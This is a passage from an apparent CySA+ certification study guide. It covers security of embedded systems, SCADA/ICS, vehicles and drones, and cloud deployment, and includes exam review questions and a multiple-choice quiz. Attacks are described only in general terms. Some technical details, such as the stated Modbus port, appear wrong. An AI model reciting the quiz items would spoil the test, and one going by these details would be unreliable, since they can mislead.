Real-time operating systems (RTOSs) are
designed to process data as it comes in, typically without
buffer delays. Like all systems, they have a certain
amount of latency in the processing. One of the key
issues with these systems is to control the jitter (the
variability of such latency).
Many IoT devices use an RTOS. These operating systems
were not really designed for security and some issues
have surfaced. For example, VxWorks 6.5 and later
versions have found to be susceptible to a vulnerability
that allows remote attackers full control over targeted
devices. The ARMIS security firm discovered and
announced 11 vulnerabilities, including six critical
vulnerabilities, collectively branded URGENT/11 in the
summer of 2019. This is disturbing, because VxWorks is
used in mission-critical systems for the enterprise,
including SCADA, elevator, and industrial controllers, as
well as in healthcare equipment, including patient
monitors and MRI scanners.
SYSTEM-ON-CHIP (SOC)
System-on-Chip (SoC) have become typical inside cell
phone electronics for their reduced energy use. A
baseband processor is a chip in a network interface that
manages all the radio functions. A baseband processor
typically uses its own RAM and firmware. Since the
software that runs on baseband processors is usually
proprietary, it is impossible to perform an independent
code audit. In March 2014, makers of the free Android
derivative Replicant announced they had found a
backdoor in the baseband software of Samsung Galaxy
phones that allows remote access to the user data stored
on the phone. Although it has been some time since this
happened, it is a reminder that SoCs can be a security
issue.
FIELD PROGRAMMABLE
GATE ARRAY (FPGA)
A programmable logic device (PLD) is an integrated
circuit with connections or internal logic gates that can
be changed through a programming process. A field
programmable gate array (FPGA) is a type of PLD
that is programmed by blowing fuse connections on the
chip or using an antifuse that makes a connection when a
high voltage is applied to the junction.
FPGAs are used extensively in IoT implementations and
in cloud scenarios. In 2019, scientists discovered a
vulnerability in FPGAs. In a side-channel attack, cyber
criminals use the energy consumption of the chip to
retrieve information that allows them to break its
encryption. It is also possible to tamper with the
calculations or even to crash the chip altogether, possibly
resulting in data losses.
PHYSICAL ACCESS
CONTROL
Access control is all about using physical or logical
controls to control who or what has access to a network,
system, or device. It also involves what type of access is
given to the information, network, system, device, or
facility. Access control is primarily provided using
physical and logical controls.
Physical access focuses on controlling access to a
network, system, or device. In most cases, physical
access involves using access control to prevent users
from being able to touch network components (including
wiring), systems, or devices. While locks are the most
popular physical access control method to preventing
access to devices in a data center, other physical controls,
such as guards and biometrics, should also be
considered, depending on the needs of the organization
and the value of the asset being protected.
When installing an access control system, security
professionals should understand who needs access to the
asset being protected and how those users need to access
the asset. When multiple users need access to an asset,
the organization should set up a multilayer access
control system. For example, users wanting access to the
building may only need to sign in with a security guard.
However, to access the locked data center within the
same building, users would need a smart card. Both of
these would be physical access controls. To protect data
on a single server within the building (but not in the data
center), the organization would need to deploy such
mechanisms as authentication, encryption, and access
control lists (ACLs) as logical access controls but could
also place the server in a locked server room to provide
physical access control. When deploying physical and
logical access controls, security professionals must
understand the access control administration methods
and the different assets that must be protected and their
possible access controls.
Systems
To fully protect the systems used by the organization,
including client and server computers, security
professionals may rely on both physical and logical
access controls. However, some systems, like client
computers, may be deployed in such a manner that only
minimal physical controls are used. If a user is granted
access to a building, he or she may find client computers
being used in nonsecure cubicles throughout the
building. For these systems, a security professional must
ensure that the appropriate authentication mechanisms
are deployed. If confidential information is stored on the
client computers, encryption should also be deployed.
But only the organization can best determine which
controls to deploy on individual client computers. When
it comes to servers, determining which access controls to
deploy is usually a more complicated process. Security
professionals should work with the server owner,
whether it is a department head or an IT professional, to
determine the value of the asset and the needed
protection. Of course, most servers should be placed in a
locked room. In many cases, this will be a data center or
server room. However, servers can be deployed in
regular locked offices if necessary. In addition, other
controls should be deployed to ensure that the system is
fully protected. The access control needs of a file server
are different from those of a web server or database
server. It is vital that the organization perform a
thorough assessment of the data that is being processed
and stored on the system before determining which
access controls to deploy. If limited resources are
available, security professionals must ensure that their
most important systems have more access controls than
other systems.
Devices
As with systems, physical access to devices is best
provided by placing the devices in a secure room. Logical
access to devices is provided by implementing the
appropriate ACL or rule list, authentication, and
encryption, as well as securing any remote interfaces that
are used to manage the device. In addition, security
professionals should ensure that the default accounts
and passwords are changed or disabled on the device.
For any IT professionals that need to access the device, a
user account should be configured for the professional
with the appropriate level of access needed. If a remote
interface is used, make sure to enable encryption, such as
SSL, to ensure that communication via the remote
interface is not intercepted and read. Security
professionals should closely monitor vendor
announcements for any devices to ensure that the
devices are kept up to date with the latest security
patches and firmware updates.
Facilities
With facilities, the primary concern is physical access,
which can be provided using locks, fencing, bollards,
guards, and closed-circuit television (CCTV). Many
organizations think that such measures are enough. But
with today’s advanced industrial control systems and the
IoT, organizations must also consider any devices
involved in facility security. If an organization has an
alarm/security system that allows remote viewing access
from the Internet, the appropriate logical controls must
be in place to prevent a malicious user from accessing
the system and changing its settings or from using the
system to gain inside information about the facility
layout and day-to-day operations. If the organization
uses an industrial control system (ICS), logical controls
should also be a priority. Security professionals must
work with organizations to ensure that physical and
logical controls are implemented appropriately to ensure
that the entire facility is protected.
Note
There are two “ICSs” covered in this chapter. It can mean either industrial
control system (ICS) or Incident Command System (ICS).
Physical access control systems are any systems used to
allow or deny physical access to the facility. Examples
include the following:
• Mantrap: This is a series of two doors with a
small room between them. The user is
authenticated at the first door and then allowed
into the room. At that point, additional
verification occurs (such as a guard visually
identifying the person), and then the person is
allowed through the second door. Mantraps are
typically used only in very high-security
situations. They can help prevent tailgating.
Figure 5-2 illustrates a mantrap design.
Figure 5-2 Mantrap
• Proximity readers: These readers are door
controls that read a proximity card from a short
distance and are used to control access to
sensitive rooms. These devices can also provide a
log of all entries and exits.
• IP-based access control and video systems:
When using these systems, a network traffic
baseline for each system should be developed so
that unusual traffic can be detected.
Some higher-level facilities are starting to incorporate
biometrics as well, especially in high-security
environments where terrorist attacks are a concern.
BUILDING AUTOMATION
SYSTEMS
The networking of facility systems has enhanced the
ability to automate the management of systems,
including the following:
• Lighting
• HVAC
• Water systems
• Security alarms
Bringing together the management of these seemingly
disparate systems allows for the orchestration of their
interaction in ways that were never before possible.
When industry leaders discuss the IoT, the success of
building automation is often used as a real example of
where connecting other devices, such as cars and street
signs, to the network can lead. These systems usually can
pay for themselves in the long run by managing the
entire ecosystem more efficiently in real time than a
human could ever do. If a wireless version of such a
system is deployed, keep the following issues in mind:
• Interference issues: Construction materials
may prevent you from using wireless everywhere.
• Security: Use encryption, separate the building
automation systems (BAS) network from the IT
network, and prevent routing between the
networks.
• Power: When Power over Ethernet (PoE) cannot
provide power to controllers and sensors, ensure
that battery life supports a reasonable lifetime and
that procedures are created to maintain batteries.
IP Video
IP video systems provide a good example of the benefits
of networking applications. These systems can be used
for both surveillance of a facility and facilitating
collaboration. An example of the layout of an IP
surveillance system is shown in Figure 5-3.
Figure 5-3 IP Surveillance
IP video has also ushered in a new age of remote
collaboration. It has saved a great deal of money on
travel expenses while at the same time making more
efficient use of time.
Issues to consider and plan for when implementing IP
video systems include the following:
• Expect a large increase in the need for bandwidth.
• QoS needs to be configured to ensure
performance.
• Storage needs to be provisioned for the camera
recordings. This could entail cloud storage, if
desired.
• The initial cost may be high.
HVAC Controllers
One of the best examples of the marriage of IP networks
and a system that formerly operated in a silo is the
heating, ventilation, and air conditioning (HVAC)
system. HVAC systems usually use a protocol called
Building Automation and Control Networks
(BACnet), which is an application, network, and media
access control (MAC) layer communications service. It
can operate over a number of Layer 2 protocols,
including Ethernet.
To use the BACnet protocol in an IP world, BACnet/IP
(B/IP) was developed. The BACnet standard makes
exclusive use of MAC addresses for all data links,
including Ethernet. To support IP, IP addresses are
needed. BACnet/IP, Annex J, defines an equivalent MAC
address composed of a 4-byte IP address followed by a 2byte UDP port number. A range of 16 UDP port numbers
has been registered as hexadecimal BAC0 through BACF.
While putting HVAC systems on an IP network makes
them more manageable, it has become apparent that
these networks should be separate from the internal
network. In the infamous Target breach, hackers broke
into the network of a company that managed the
company’s HVAC systems. The intruders leveraged the
trust and network access granted to the HVAC company
by Target and then, from these internal systems, broke
into the point-of-sale systems and stole credit and debit
card numbers, as well as other personal customer
information.
Sensors
Sensors are designed to gather information of some sort
and make it available to a larger system, such as an
HVAC controller. Sensors and their role in SCADA
systems are covered later in this chapter.
VEHICLES AND DRONES
Wireless capabilities added to vehicles and drones have
ushered in a new world of features, while at the same
time opening the door for all sorts of vulnerabilities
common to any network-connected device.
Connected vehicles are not those that drive themselves,
although those are coming. A connected vehicle is one
that can be reached with a wireless connection of some
sort. MacAfee has identified the attack surface that exists
in a connected vehicle. Figure 5-4 shows the areas of
vulnerability.
Figure 5-4 Vehicle Attack Surface
As you can see in Figure 5-4, critical vehicle systems may
be vulnerable to wireless attacks.
CAN Bus
While autonomous vehicles may still be a few years off,
when they arrive they will make use of a new standard
for vehicle-to-vehicle and vehicle-to-road
communication. Controller Area Network (CAN
bus) is designed to allow vehicle microcontrollers and
devices to communicate with each other’s applications
without a host computer. Sounds great, huh?
It turns out CAN is a low-level protocol and does not
support any security features intrinsically. There is also
no encryption in standard CAN implementations, which
leaves these networks open to data interception.
Failure by vendors to implement their own security
measures may result in attacks if attackers manage to
insert messages on the bus. While passwords exist for
some safety-critical functions, such as modifying
firmware, programming keys, or controlling antilock
brake actuators, these systems are not implemented
universally and have a limited number of seed/key pairs
(meaning a brute-force attack is more likely to succeed).
Hopefully, an industry security standard for the CAN bus
will be developed at some point.
Drones
Drones are managed wirelessly and, as such, offer
attackers the same door of entry as found in connected
cars. In January 2020, the U.S. Department of the
Interior grounded nonemergency drones due to security
concerns. Why? The U.S. Department of Defense (DoD)
issued warning that Chinese-made drones may be
compromised and capable of being used for espionage.
This follows a memo from the Navy & Marine Corps
Small Tactical Unmanned Aircraft Systems Program
Manager that “images, video and flight records could be
uploaded to unsecured servers in other countries via live
streaming.” Finally, the U.S. Department of Homeland
Security previously warned the private sector that their
data may be pilfered if they use commercial drone
systems made in China.
Beyond the fear of Chinese-made drones that contain
backdoors, there is also the risk of a drone being
“hacked” and taken over by the attacker in midflight.
Since 2016, it has been known that it is possible in some
cases to do the following:
• Overwhelm the drone with thousands of
connection requests, causing the drone to land
• Send large amounts of data to the drone,
exceeding its capacity and causing it to crash
• Convince the drone that orders sent to land the
drone were coming from the drone itself rather
than attackers, causing the drone to follow orders
and land
At the time of writing in 2020, attackers have had four
years to probe for additional attack points. It is obvious
that drone security has to be made more robust.
WORKFLOW AND PROCESS
AUTOMATION SYSTEMS
Automating workflows and processes saves time and
human resources. One of the best examples is the
automation revolution occurring in network
management. Automation tools such as Puppet, Chef,
and Ansible and scripting are automating once manual
tasks such as log analyses, patch application, and
intrusion prevention.
These tools and scripts perform the job they do best,
which is manual drudgery, thus freeing up humans to do
what they do best, which is deep analysis and planning.
Alas, with automation comes vulnerabilities. An example
is the cross-site scripting (XSS) vulnerability found in
IBM workflow systems, as detailed in CVE-2019-4149,
which can allow users to embed arbitrary JavaScript
code in the Web UI, thus altering the intended
functionality and potentially leading to credentials
disclosure within a trusted session. These automation
systems also need to be made more secure.
INCIDENT COMMAND
SYSTEM (ICS)
The Incident Command System (ICS) is designed
by FEMA to provide a way to enable effective and
efficient domestic incident management by integrating a
combination of facilities, equipment, personnel,
procedures, and communications operating within a
common organizational structure.
ICS provides guidance for how to organize assets to
respond to an incident (system description) and
processes to manage the response through its successive
stages (concept of operations). All response assets are
organized into five functional areas: Command,
Operations, Logistics, Planning, and
Administration/Finance. Figure 5-5 highlights the five
functional areas of ICS and their primary
responsibilities.
Figure 5-5 Functional Areas of ICS
SUPERVISORY CONTROL
AND DATA ACQUISITION
(SCADA)
Industrial control system (ICS) is a general term that
encompasses several types of control systems used in
industrial production. The most widespread is
supervisory control and data acquisition
(SCADA). SCADA is a system that operates with coded
signals over communication channels to provide control
of remote equipment. ICSs include the following
components:
• Sensors: Sensors typically have digital or analog
I/O and are not in a form that can be easily
communicated over long distances.
• Remote terminal units (RTUs): RTUs
connect to the sensors and convert sensor data to
digital data, including telemetry hardware.
• Programmable logic controllers (PLCs):
PLCs connect to the sensors and convert sensor
data to digital data; they do not include telemetry
hardware.
• Telemetry system: Such a system connects
RTUs and PLCs to control centers and the
enterprise.
• Human interface: Such an interface presents
data to the operator.
ICSs should be securely segregated from other networks
as a security layer. The Stuxnet virus hit the SCADA
systems used for the control and monitoring of industrial
processes. SCADA components are considered privileged
targets for cyberattacks. By using cyber tools, it is
possible to destroy an industrial process. This was the
idea used on the attack on the nuclear plant in Natanz in
order to interfere with the Iranian nuclear program.
Considering the criticality of SCADA-based systems,
physical access to these systems must be strictly
controlled. Systems that integrate IT security with
physical access controls, such as badging systems and
video surveillance, should be deployed. In addition, a
solution should be integrated with existing information
security tools such as log management and IPS/IDS. A
helpful publication by NIST, SP 800-82 Rev. 2,
recommends the major security objectives for an ICS
implementation should include the following:
• Restricting logical access to the ICS network and
network activity
• Restricting physical access to the ICS network and
devices
• Protecting individual ICS components from
exploitation
• Restricting unauthorized modification of data
• Detecting security events and incidents
• Maintaining functionality during adverse
conditions
• Restoring the system after an incident
In a typical ICS, this means a defense-in-depth strategy
should include the following, according to SP 800-82
Rev. 2:
• Develop security policies, procedures, training,
and educational material that applies specifically
to the ICS.
• Address security throughout the life cycle of the
ICS.
• Implement a network topology for the ICS that has
multiple layers, with the most critical
communications occurring in the most secure and
reliable layer.
• Provide logical separation between the corporate
and ICS networks.
• Employ a DMZ network architecture.
• Ensure that critical components are redundant
and are on redundant networks.
• Design critical systems for graceful degradation
(fault tolerant) to prevent catastrophic cascading
events.
• Disable unused ports and services on ICS devices
after testing to assure this will not impact ICS
operation.
• Restrict physical access to the ICS network and
devices.
• Restrict ICS user privileges to only those that are
required to perform each person’s job.
• Use separate authentication mechanisms and
credentials for users of the ICS network and the
corporate network.
• Use modern technology, such as smart cards, for
Personal Identity Verification (PIV).
• Implement security controls such as intrusion
detection software, antivirus software, and file
integrity checking software, where technically
feasible, to prevent, deter, detect, and mitigate the
introduction, exposure, and propagation of
malicious software to, within, and from the ICS.
• Apply security techniques such as encryption
and/or cryptographic hashes to ICS data storage
and communications where determined
appropriate.
• Expeditiously deploy security patches after testing
all patches under field conditions on a test system
if possible, before installation on the ICS.
• Track and monitor audit trails on critical areas of
the ICS.
• Employ reliable and secure network protocols and
services where feasible.
SP 800-82 Rev. 2 recommends that security
professionals should consider the following when
designing security solutions for ICS devices: timeliness
and performance requirements, availability
requirements, risk management requirements, physical
effects, system operation, resource constraints,
communications, change management, managed
support, component lifetime, and component location.
ICS implementations use a variety of protocols and
services, including
• Modbus: A master/slave protocol that uses port
50
• BACnet: A master/slave protocol that uses port
47808 (introduced earlier in this chapter)
• LonWorks/LonTalk: A peer-to-peer protocol
that uses port 1679
• Distributed Network Protocol 3 (DNP3): A
master/slave protocol that uses port 19999 when
using Transport Layer Security (TLS) and port
20000 when not using TLS
ICS implementations can also use IEEE 802.1X, Zigbee,
and Bluetooth for communication.
SP 800-82 Rev. 2 outlines the following basic process for
developing an ICS security program:
1. Develop a business case for security.
2. Build and train a cross-functional team.
3. Define charter and scope.
4. Define specific ICS policies and procedures.
5. Implement an ICS Security Risk Management
Framework.
a. Define and inventory ICS assets.
b. Develop a security plan for ICS systems.
c. Perform a risk assessment.
d. Define the mitigation controls.
6. Provide training and raise security awareness for
ICS staff.
The ICS security architecture should include network
segregation and segmentation, boundary protection,
firewalls, a logically separated control network, and dual
network interface cards (NICs) and should focus mainly
on suitable isolation between control networks and
corporate networks. Security professionals should also
understand that many ICS/SCADA systems use weak
authentication and outdated operating systems. The
inability to patch these systems (and even the lack of
available patches) means that the vendor is usually not
proactively addressing any identified security issues.
Finally, many of these systems allow unauthorized
remote access, thereby making it easy for an attacker to
breach the system with little effort.
Modbus
As you learned in the previous discussion, Modbus is one
of the protocols used in industrial control systems. It is a
serial protocol created by Modicon (now Schneider
Electric) to be used by its PLCs. It is popular because it is
royalty free. It enables communication among many
devices connected to the same network; for example, a
system that measures water flow and communicates the
results to a computer. An example of a Modbus
architecture is shown in Figure 5-6.
Figure 5-6 Modbus Architecture
EXAM PREPARATION TASKS
As mentioned in the section “How to Use This Book” in
the Introduction, you have several choices for exam
preparation: the exercises here, Chapter 22, “Final
Preparation,” and the exam simulation questions in the
Pearson Test Prep Software Online.
REVIEW ALL KEY TOPICS
Review the most important topics in this chapter, noted
with the Key Topics icon in the outer margin of the page.
Table 5-2 lists a reference of these key topics and the
page numbers on which each is found.
Table 5-2 Key Topics in Chapter 5
DEFINE KEY TERMS
Define the following key terms from this chapter and
check your answers in the glossary:
mobile device management (MDM)
bring your own device (BYOD) policies
Payment Card Industry Data Security Standard (PCI
DSS)
USB On-The-Go (USB OTG)
rooting or jailbreaking
push notification services
geotagging
near field communication (NFC)
domain bridging
Internet of Things (IoT)
embedded system
real-time operating system (RTOS)
System-on-Chip (SoC)
field programmable gate array (FPGA)
mantrap
proximity readers
Building Automation and Control Networks (BACnet)
Controller Area Network (CAN bus)
Incident Command System (ICS)
supervisory control and data acquisition (SCADA)
remote terminal units (RTUs)
programmable logic controllers (PLCs)
telemetry system
Modbus
LonWorks/LonTalk
Distributed Network Protocol 3 (DNP3)
REVIEW QUESTIONS
1. List at least two threats presented by the
introduction of personal mobile devices
(smartphones and tablets) into an organization’s
network.
2. What is the single biggest threat to mobile devices?
3. Match the term on the left with its definition on the
right.
4. ___________________ refers to a system of
interrelated computing devices, mechanical and
digital machines, and objects that are provided
with unique identifiers and the ability to transfer
data over a network without requiring human-tohuman or human-to-computer interaction.
5. What process enabled the enemy to pinpoint the
location of four U.S. Army Apache helicopters on
the ground and destroy them?
6. Match the term on the left with its definition on the
right.
7. __________________ is a text messaging
service component of most telephone, World Wide
Web, and mobile telephony systems.
8. List at least one example of an IoT deployment.
9. A(n) __________________ is a series of two
doors with a small room between them.
10. To use the BACnet protocol in an IP world,
__________________ was developed.
Chapter 6. Threats and
Vulnerabilities Associated
with Operating in the
Cloud
This chapter covers the following topics related
to Objective 1.6 (Explain the threats and
vulnerabilities associated with operating in the
cloud) of the CompTIA Cybersecurity Analyst
(CySA+) CS0-002 certification exam:
• Cloud service models: Describes Software as a
Service (SaaS), Platform as a Service (PaaS), and
Infrastructure as a Service (IaaS)
• Cloud deployment models: Covers public,
private, community, and hybrid clouds
• Function as a Service (FaaS)/serverless
architecture: Discusses the concepts of FaaS
• Infrastructure as code (IaC): Investigates the
use of scripting in the environment
• Insecure application programming
interface (API): Identifies vulnerabilities in the
use of APIs
• Improper key management: Discusses best
practices for key management
• Unprotected storage: Describes threats to
storage systems
• Logging and monitoring: Covers issues related
to insufficient logging and monitoring and
inability to access logging tools
Placing resources in a cloud environment has many
benefits, but also introduces a host of new security
considerations. This chapter discusses these
vulnerabilities and some measures that you can take to
mitigate them.
“DO I KNOW THIS
ALREADY?” QUIZ
The “Do I Know This Already?” quiz enables you to
assess whether you should read the entire chapter. If you
miss no more than one of these eight self-assessment
questions, you might want to skip ahead to the “Exam
Preparation Tasks” section. Table 6-1 lists the major
headings in this chapter and the “Do I Know This
Already?” quiz questions covering the material in those
headings so that you can assess your knowledge of these
specific areas. The answers to the “Do I Know This
Already?” quiz appear in Appendix A.
Table 6-1 “Do I Know This Already?” Foundation
Topics Section-to-Question Mapping
Caution
The goal of self-assessment is to gauge your mastery of the topics in this
chapter. If you do not know the answer to a question or are only partially sure
of the answer, you should mark that question as wrong for purposes of the selfassessment. Giving yourself credit for an answer you correctly guess skews
your self-assessment results and might provide you with a false sense of
security.
1. In which cloud deployment model does an
organization provide and manage some resources
in-house and has other resources provided
externally via a public cloud?
a. Private
b. Public
c. Community
d. Hybrid
2. Which of the following cloud service models is
typically used as a software development
environment?
a. SaaS
b. PaaS
c. IaaS
d. FaaS
3. Which of the following is an extension of the PaaS
model?
a. FaaS
b. IaC
c. SaaS
d. IaaS
4. Which of the following manages and provisions
computer data centers through machine-readable
definition files?
a. IaC
b. PaaS
c. SaaS
d. IaaS
5. Which of the following can enhance security of
APIs?
a. DPAPI
b. SGX
c. SOAP
d. REST
6. Which of the following contains recommendations
for key management?
a. NIST SP 800-57 REV. 5
b. PCI-DSS
c. OWASP
d. FIPS
7. Which of the following is the most exposed part of a
cloud deployment?
a. Cryptographic functions
b. APIs
c. VMs
d. Containers
8. Which of the following is lost with improper
auditing? (Choose the best answer.)
a. Cryptographic security
b. Accountability
c. Data security
d. Visibility
FOUNDATION TOPICS
CLOUD DEPLOYMENT
MODELS
Cloud computing is all the rage these days, and it comes
in many forms. The basic idea of cloud computing is to
make resources available in a web-based data center so
the resources can be accessed from anywhere. When a
company pays another company to host and manage this
type of environment, it is considered to be a public cloud
solution. If the company hosts this environment itself, it
is considered to be a private cloud solution. The different
cloud deployment models are as follows:
• Public: A public cloud is the standard cloud
deployment model, in which a service provider
makes resources available to the public over the
Internet. Public cloud services may be free or may
be offered on a pay-per-use model. An
organization needs to have a business or technical
liaison responsible for managing the vendor
relationship but does not necessarily need a
specialist in cloud deployment. Vendors of public
cloud solutions include Amazon, IBM, Google,
Microsoft, and many more. In a public cloud
deployment model, subscribers can add and
remove resources as needed, based on their
subscription.
• Private: A private cloud is a cloud deployment
model in which a private organization implements
a cloud in its internal enterprise, and that cloud is
used by the organization’s employees and
partners. Private cloud services require an
organization to employ a specialist in cloud
deployment to manage the private cloud.
• Community: A community cloud is a cloud
deployment model in which the cloud
infrastructure is shared among several
organizations from a specific group with common
computing needs. In this model, agreements
should explicitly define the security controls that
will be in place to protect the data of each
organization involved in the community cloud and
how the cloud will be administered and managed.
• Hybrid: A hybrid cloud is a cloud deployment
model in which an organization provides and
manages some resources in-house and has others
provided externally via a public cloud. This model
requires a relationship with the service provider
as well as an in-house cloud deployment
specialist. Rules need to be defined to ensure that
a hybrid cloud is deployed properly. Confidential
and private information should be limited to the
private cloud.
CLOUD SERVICE MODELS
There is trade-off to consider when a decision must be
made between cloud architectures. A private solution
provides the most control over the safety of your data but
also requires the staff and the knowledge to deploy,
manage, and secure the solution. A public cloud puts
your data’s safety in the hands of a third party, but that
party is more capable and knowledgeable about
protecting data in such an environment and managing
the cloud environment. With a public solution, various
cloud service models can be purchased. Some of these
models include the following:
• Software as a Service (SaaS): With SaaS, the
vendor provides the entire solution, including the
operating system, the infrastructure software, and
the application. The vendor may provide an email
system, for example, in which it hosts and
manages everything for the customer. An example
of this is a company that contracts to use
Salesforce or Intuit QuickBooks using a browser
rather than installing the application on every
machine. This frees the customer company from
performing updates and other maintenance of the
applications.
• Platform as a Service (PaaS): With PaaS, the
vendor provides the hardware platform or data
center and the software running on the platform,
including the operating systems and
infrastructure software. The customer is still
involved in managing the system. An example of
this is a company that engages a third party to
provide a development platform for internal
developers to use for development and testing.
• Infrastructure as a Service (IaaS): With
IaaS, the vendor provides the hardware platform
or data center, and the customer installs and
manages its own operating systems and
application systems. The vendor simply provides
access to the data center and maintains that
access. An example of this is a company hosting
all its web servers with a third party that provides
the infrastructure. With IaaS, customers can
benefit from the dynamic allocation of additional
resources in times of high activity, while those
same resources are scaled back when not needed,
which saves money.
Figure 6-1 illustrates the relationship of these services to
one another.
Figure 6-1 Cloud Service Models
FUNCTION AS A SERVICE
(FAAS)/SERVERLESS
ARCHITECTURE
Function as a Service (FaaS) is an extension of PaaS
that goes further and completely abstracts the virtual
server from the developers. In fact, charges are based not
on server instance sizes but on consumption and
executions. This is why it is sometimes also called
serverless architecture. In this architecture, the focus is
on a function, operation, or piece of code that is executed
as a function. These services are event-driven in nature.
Although FaaS is not perfect for every workload, for
transactions that happen hundreds of times per second,
there is a lot of value in isolating that logic to a function
that can be scaled. Additional advantages include the
following:
• Ideal for dynamic or burstable workloads:
If you run something only once a day or month,
there’s no need to pay for a server 24/7/365.
• Ideal for scheduled tasks: FaaS is a perfect
way to run a certain piece of code on a schedule.
Figure 6-2 shows a useful car analogy for comparing
traditional computing (own a car), cloud computing
(rent a car), and FaaS/serverless computing (car
sharing). VPS in the rent-a-car analogy stands for virtual
private server and refers to provisioning a virtual server
from a cloud service provider.
Figure 6-2 Car Analogy for Serverless Computing
The following are top security issues with serverless
computing:
• Function event data injection: Triggered not only
through untrusted input such as through a web
API call
• Broken authentication: Coding issues ripe for
exploit and attacks, which lead to unauthorized
authentication
• Insecure serverless deployment configuration:
Human error in setup
• Over-privileged function permissions and roles:
Failure to implement the least privilege concept
INFRASTRUCTURE AS CODE
(IAC)
In another reordering of the way data centers are
handled, Infrastructure as Code (IaC) manages and
provisions computer data centers through machinereadable definition files, rather than physical hardware
configuration or interactive configuration tools. IaC can
use either scripts or declarative definitions, rather than
manual processes, but the term more often is used to
promote declarative approaches.
Naturally, there are advantage to this approach:
• Lower cost
• Faster speed
• Risk reduction (remove errors and security
violations)
Figure 6-3 illustrates an example of how some code
might be capable of making changes on its own without
manual intervention. As you can see in Figure 6-3, these
code changes can be made to the actual state of the
configurations in the cloud without manual intervention.
Figure 6-3 IaC in Action
Security issues with Infrastructure as Code (IaC) include
• Compliance violations: Policy guardrails based on
standards are not enforced
• Data exposures: Lack of encryption
• Hardcoded secrets: Storing plain text credentials,
such as SSH keys or account secrets, within source
code
• Disabled audit logs: Failure to utilize audit logging
services like AWS CloudTrail and Amazon
CloudWatch
• Untrusted image sources: Templates may
inadvertently refer to OS or container images
from untrusted sources
INSECURE APPLICATION
PROGRAMMING INTERFACE
(API)
Interfaces and APIs tend to be the most exposed parts of
a system because they’re usually accessible from the
open Internet. API are used extensively in cloud
environments. With respect to APIs, a host of
approaches—including Simple Object Access Protocol
(SOAP), REpresentational State Transfer (REST), and
JavaScript Object Notation (JSON)—are available, and
many enterprises find themselves using all of them.
The use of diverse protocols and APIs is also a challenge
to interoperability. With networking, storage, and
authentication protocols, support and understanding of
the protocols in use is required of both endpoints. It
should be a goal to reduce the number of protocols in use
in order to reduce the attack surface. Each protocol has
its own history of weaknesses to mitigate.
One API that can enhance cloud security is the Data
Protection API (DPAPI) offered by Windows. Let’s
look at what it offers. Among other features, DPAPI
supports in-memory processing, an approach in which
all data in a set is processed from memory rather than
from the hard drive. In-memory processing assumes that
all the data is available in memory rather than just the
most recently used data, as is usually the case when
using RAM or cache memory. This results in faster
reporting and decision making in business. Securing inmemory processing requires encrypting the data in RAM.
DPAPI lets you encrypt data using the user’s login
credentials. One of the key questions is where to store
the key, because storing it in the same location as the
data typically is not a good idea (the next section
discusses key management). Intel’s Software Guard
Extensions (SGX), shipping with Skylake and newer
CPUs, allows you to load a program into your processor,
verify that its state is correct (remotely), and protect its
execution. The CPU automatically encrypts everything
leaving the processor (that is, everything that is offloaded
to RAM) and thereby ensures security.
Even the most secure devices have some sort of API that
is used to perform tasks. Unfortunately, untrustworthy
people use those same APIs to perform unscrupulous
tasks. APIs are used in the Internet of Things (IoT) so
that devices can speak to each other without users even
knowing they are there. APIs are used to control and
monitor things we use every day, including fitness bands,
home thermostats, lighting, and automobiles.
Comprehensive security must protect the entire
spectrum of devices in the digital workplace, including
apps and APIs. API security is critical for an organization
that is exposing digital assets.
Guidelines for providing API security include the
following:
• Use the same security controls for APIs as for any
web application in the enterprise.
• Use Hash-based Message Authentication Code
(HMAC).
• Use encryption when passing static keys.
• Use a framework or an existing library to
implement security solutions for APIs.
• Implement password encryption instead of single
key-based authentication.
IMPROPER KEY
MANAGEMENT
Key management is essential to ensure that the
cryptography provides confidentiality, integrity, and
authentication in cloud environments. If a key is
compromised, it can have serious consequences
throughout an organization.
Key management involves the entire process of ensuring
that keys are protected during creation, distribution,
transmission, and storage. As part of this process, keys
must also be destroyed properly. When you consider the
vast number of networks over which the key is
transmitted and the different types of systems on which a
key is stored, the enormity of this issue really comes to
light.
As the most demanding and critical aspect of
cryptography, it is important that security professionals
understand key management principles.
Keys should always be stored in ciphertext when stored
on a noncryptographic device. Key distribution, storage,
and maintenance should be automatic by integrating the
processes into the application.
Because keys can be lost, backup copies should be made
and stored in a secure location. A designated individual
should have control of the backup copies, and other
individuals should be designated to serve as emergency
backups. The key recovery process should also require
more than one operator, to ensure that only valid key
recovery requests are completed. In some cases, keys are
even broken into parts and deposited with trusted
agents, who provide their part of the key to a central
authority when authorized to do so. Although other
methods of distributing parts of a key are used, all the
solutions involve the use of trustee agents entrusted with
part of the key and a central authority tasked with
assembling the key from its parts. Also, key recovery
personnel should span across the entire organization and
not just be members of the IT department.
Organizations should also limit the number of keys that
are used. The more keys that you have, the more keys
you must ensure are protected. Although a valid reason
for issuing a key should never be ignored, limiting the
number of keys issued and used reduces the potential
damage.
When designing the key management process, you
should consider how to do the following:
• Securely store and transmit the keys
• Use random keys
• Issue keys of sufficient length to ensure protection
• Properly destroy keys when no longer needed
• Back up the keys to ensure that they can be
recovered
Systems that process valuable information require
controls in order to protect the information from
unauthorized disclosure and modification. Cryptographic
systems that contain keys and other cryptographic
information are especially critical. Security professionals
should work to ensure that the protection of keying
material provides accountability, audit, and survivability.
Accountability involves the identification of entities that
have access to, or control of, cryptographic keys
throughout their life cycles. Accountability can be an
effective tool to help prevent key compromises and to
reduce the impact of compromises when they are
detected. Although it is preferred that no humans be able
to view keys, as a minimum, the key management system
should account for all individuals who are able to view
plaintext cryptographic keys. In addition, more
sophisticated key management systems may account for
all individuals authorized to access or control any
cryptographic keys, whether in plaintext or ciphertext
form.
Two types of audits should be performed on key
management systems:
• Security: The security plan and the procedures
that are developed to support the plan should be
periodically audited to ensure that they continue
to support the key management policy.
• Protective: The protective mechanisms
employed should be periodically reassessed with
respect to the level of security they currently
provide and are expected to provide in the future.
They should also be assessed to determine
whether the mechanisms correctly and effectively
support the appropriate policies. New technology
developments and attacks should be considered as
part of a protective audit.
Key management survivability entails backing up or
archiving copies of all keys used. Key backup and
recovery procedures must be established to ensure that
keys are not lost. System redundancy and contingency
planning should also be properly assessed to ensure that
all the systems involved in key management are fault
tolerant.
Key Escrow
Key escrow is the process of storing keys with a third
party to ensure that decryption can occur. This is most
often used to collect evidence during investigations. Key
recovery is the process whereby a key is archived in a
safe place by the administrator.
Key Stretching
Key stretching, also referred to as key strengthening,
is a cryptographic technique that involves making a weak
key stronger by increasing the time it takes to test each
possible key. In key stretching, the original key is fed into
